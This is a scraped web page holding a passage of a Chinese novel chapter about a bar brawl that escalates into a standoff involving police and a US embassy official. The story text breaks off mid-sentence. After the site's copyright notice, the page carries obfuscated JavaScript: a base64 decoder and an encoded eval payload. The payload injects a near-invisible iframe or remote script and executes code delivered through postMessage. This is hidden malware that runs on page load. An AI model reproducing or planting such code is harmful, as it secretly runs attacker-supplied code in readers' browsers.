!听见没有!?”“啪”的一声,杨立新先被玉倩扇了一嘴巴,“你是什么东西,敢这么跟我说话!?”这一举动把所有人都惊呆了,包括侯龙涛在内,他算看出来了,这个女孩儿是个被宠坏了的小疯丫头。“你…你…”“我什么?”“你敢打我!?”杨立新这才缓过劲儿来,又瞪起了眼睛,举在空中的左手抡了下来。侯龙涛一拉玉倩,把她护在了身后,一把抓住了杨立新的手腕儿,“姓杨的,你疯狗乱咬人啊?你要是敢碰她一根儿汗毛儿,除非我死,你这辈子,你儿子这辈子,就算被我缠上了。”“涛哥哥。”玉倩上前一步,脸上出现了灿烂的笑容,双手拉住了侯龙涛空着的右手,轻轻的摇了摇。“他妈的,狗男女!”杨立新高高举起了右手里的电g。“杨立新!”楼梯口儿上传来了一声怒吼,“你怎么说话呢!?还有没有个人民警察的样子!?”两个中年男人走了过来,说话的那个是一身警服的朝阳分局曾局长,另一个四十出头儿,穿着便装,夹着一个手包儿。“曾局?”侯龙涛撇下杨立新,走到老曾面前,“您怎么知道我在这儿?”“嗯?龙涛?你怎么会在这儿?”老曾也是一脸惊讶,他指了指玉倩,“我不是为你来的,是为她。”“于叔叔,”玉倩叫了一声儿那个便衣,她并没有注意到侯龙涛和老曾的交谈,“我爷爷让您来的?”“是啊,怎么回事儿啊?”“那个王八蛋当众调戏我,”女孩儿一指那个高个儿老外,“这个警察不问青红皂白就要打我,他就知道帮着外国人,整一个汉j。”她越说越“委屈”,小嘴儿一噘,差点儿没流出眼泪来。“她…她胡说!”杨立新可紧张了,分局长亲自到场,而不是打电话来指示放人,就足见重视程度了,“爷爷”那两个字更是吓人,怎么听怎么像是掌握大权的“老革命”的意思。“不要闹了,”老曾又吼了一声儿,“于秘书,你看…”“玉倩,曾局长,咱们找间办公室谈吧,”于秘书一指杨立新,“你是所长?”“值班副所长。”“你也跟我们来,剩下的人都在这儿等着。”“what‘s the meaningthis!?”中年老外又不干了。和他一起来的那个中国人赶忙走了上来,“我是美国大使馆的翻译庞延,这位是美国大使馆的第二秘书威廉姆斯先生,被打的人是他的儿子和他儿子的朋友,你们如果在处理的过程中有任何不公平的地方,我们将通过大使馆向你们的外交部提出严正抗议,如果因此影响了中美两国的关系,你们谁来负责?”“你叫唤什么啊?”于秘书走到那人身前,在他耳边小声儿嘀咕了两句,“去告诉那个‘二秘’,请他少安勿躁,在这儿稍等片刻,他这样闹来闹去,妨碍中国司法机关工作,还真是很有可能会影响到中美关系的,你放心,到时候要负责的一定是你们。”“你…你是干什么的?”“这样吧,你也跟我们来。”“好,好。”翻译回去跟“二秘”耳语了几句,然后就跟着其他四个人一起进了办公室。“r,太夸张了吧?”刘南捅了捅侯龙涛,“那小妞儿家里是干什么的?连他妈美国大使馆都不怵。”“不知道,不过美国大使馆有他妈什么好怵的?”“哼,你小子,下面儿的人不怕,上面儿的人怕。”“歇了吧。”侯龙涛往嘴里扔了根儿烟…第一百一十八章  外交事件(下)7/11/2003…7/15/2003办公室里,于秘书要女孩儿把事情的经过说一遍,以玉倩的性格,她当然是将老外“调戏”自己的情况添油加醋了一番,“我可以用人格担保,是那洋鬼子先动的手,于叔叔,说什么也不能放过他们,要不然,先不说我还有没有脸见人,我爷爷的面子也挂不住。”“是那么回事儿吗?”于秘书看了看杨立新。“酒吧的刘老板就在外面,”杨立新现在很难把握尺度,一边儿是美国外交官的翻译,自己刚才已经说了要严惩侯龙涛他们,结果又突然杀出来一个不明身份的秘书,看老曾对他的态度,还真不是普通人,一下儿把事情变得复杂了,现在最好的办法就是把自己先择出来,“他看到全部过程了,他说…”“你行了你,现在才想起来推卸责任吗?”玉倩打断了男人的话,“那个证人也不是好东西,我们刚到酒吧的时候,因为他违法悬挂外国国旗被我们说了一顿,他就怀恨在心,当然要找机会害我们了。你,你还想打我,我让你打,你打啊。”“不是,不是,我刚才就是一时冲动,不是真的要打你。”“玉倩,你别激动,”于秘书把女孩儿拉到一边儿,让她坐到沙发上,“叔叔一定帮你出气。”“你这是什么意思?”那个翻译可听见这话了,他得为他的美国主子争取利益啊,“你到底是什么人?这么干预警方的办案。”“我是什么人没必要向你交代,我在做我的工作,我的工作就是干预警方的办案。”就在这时,一个警察推门进来了,“曾局。”“龚队长?”杨立新一看,来人自己认识,是朝阳分局刑警队的队长龚彧。“杨所儿。”龚彧爱搭不理的打了声儿招呼,杨立新在分局的时候人缘儿就不是特别好,现在降了职更没人爱跟他掺和了,“曾局,十几个客人和三个伙计都证明是外国人先动的手,还证明他对一个女孩儿说了很多不三不四的下流话,看样子是喝多了。”“杨立新,你给没给做酒精测试?”“没…没有。”“为什么不做?”“我…我忘了。”“哼,龚彧,带那几个年轻的外国人去检查。”“好。”龚彧转身出去了。“怎么样?庞翻译,满意了吗?”于秘书指了指桌上一打厚厚的询问笔录,“曾局,根据咱们国家的法律,这件事儿应该怎么处理?”“根据我国的法律,他们触犯的是《治安管理处罚条例》,酒后寻衅滋事、调戏妇女、打
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}